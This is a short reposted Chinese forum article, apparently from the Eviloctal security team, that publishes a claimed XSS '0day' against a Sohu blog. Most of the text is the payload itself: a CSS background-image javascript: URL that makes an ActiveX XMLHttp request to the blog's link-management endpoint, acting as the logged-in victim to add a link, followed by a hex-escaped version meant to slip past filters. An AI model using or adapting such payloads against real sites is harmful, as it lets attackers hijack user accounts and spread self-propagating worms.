XSS 0DAY代码
发布时间:2016-12-26 来源:查字典编辑
摘要:文章作者:茄子宝信息来源:邪恶八进制信息安全团队(www.eviloctal.com)看到梦之光芒放出来了!我也不藏了!10月7日的时候我就...
文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
看到梦之光芒放出来了!我也不藏了!
10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSSWORM初尝试的续吧.
其实很简单,就是两次转码.
<DIVSTYLE="background-image:url(javascript:varXmlHttp=newActiveXObject("Microsoft.XMLhttp");XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true);XmlHttp.send(null);)">
ASCII转码参考http://s0n9.blog.sohu.com/16002288.html
写成下面16进制转义字符串
<divstyle="background-image:07507206C02806A06107606107306307206907007403A06507606106C02805307407206906E06702E06607206F06D04306806107204306F06......"></div>